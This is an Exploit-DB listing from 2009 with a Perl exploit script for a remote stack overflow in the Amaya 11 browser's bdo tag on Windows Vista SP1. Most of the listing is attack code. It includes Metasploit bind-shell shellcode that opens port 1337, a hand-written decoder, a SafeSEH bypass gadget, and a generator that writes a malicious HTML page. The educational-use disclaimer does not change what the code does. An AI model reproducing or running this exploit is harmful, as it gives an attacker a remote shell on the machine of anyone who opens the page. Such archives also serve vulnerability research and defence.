Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow

EDB-ID:

7989

CVE:

N/A

EDB Verified:

Author:

Rob Carter

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2009-02-04

Vulnerable App: 
#!/usr/bin/perl

#############################################
#
#   Amaya 11 bdo tag stack overflow
#
#   author: Rob Carter (cartrel@hotmail.com)
#
#   targets: windows vista sp1
#
#   modified the alpha-numeric shell-code
#   from metasploit since the first 12 bytes
#   didn't fall within the ASCII range of
#   0x01-0x7f. otherwise my payload would
#   have been corrupted on the stack. wrote
#   a 47-byte decoder to repair the shell-
#   code to its original state.
#
#   this exploit bypasses safeSEH by jumping
#   to a pop pop push pop ret sequence in
#   one of the amaya modules that has a
#   constant base address in memory. ret's
#   back to the stack, short jump over the
#   overwritten SEH, decodes the first 12
#   bytes of the shellcode and then runs
#   the repaired shellcode to bind a shell
#   on port 1337.
#
#   $ perl amaya_sploit.pl > pwn.html
#
#   the author is not responsible for any misuse of
#   this code. it is intended for educational
#   purposes only
#
#############################################

# win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
"\x7f\x01\x01\x7f\x03\x68\x78\x70\x6f\x6f\x3d\x37".
"\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x48".
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x38".
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x48".
"\x49\x48\x4e\x36\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x54\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36".
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x43\x4a\x46\x47\x37\x43\x47".
"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x45\x43\x35\x43\x55\x43\x54".
"\x43\x45\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x45\x30".
"\x49\x43\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x36\x46\x4a".
"\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x45\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d".
"\x42\x55\x46\x45\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x56\x4a\x36\x43\x56".
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x32".
"\x43\x49\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x35\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$decoder =
"\x5b".			# pop ebx
"\x5b".			# pop ebx
"\x68\x6c\x02\x58\x6c".	# push 0x6c58026c
"\x58".			# pop eax
"\x01\x43\x38".		# add dword ptr[ebx+38],eax
"\x68\x01\x01\x01\x10".	# push 0x10010101
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f".	# push 0x7f7f7f01
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x11\x11\x01\x01".	# push 0x01011111
"\x58".			# pop eax
"\x01\x43\x40".		# add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11".	# push 0x11117f7f
"\x58".			# pop eax
"\x01\x43\x40";		# add dword ptr[ebx+40],eax

$payload =
"<bdo dir=\"".
"A" x 6905 .
"\x74\x06\x41\x41".
"\x51\x55\x03\x10".	# pop - pop - push - pop - ret 0c
$decoder.
"A".
$shellcode.
"\">pwnd!</bdo>";

print $payload;

# milw0rm.com [2009-02-04]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services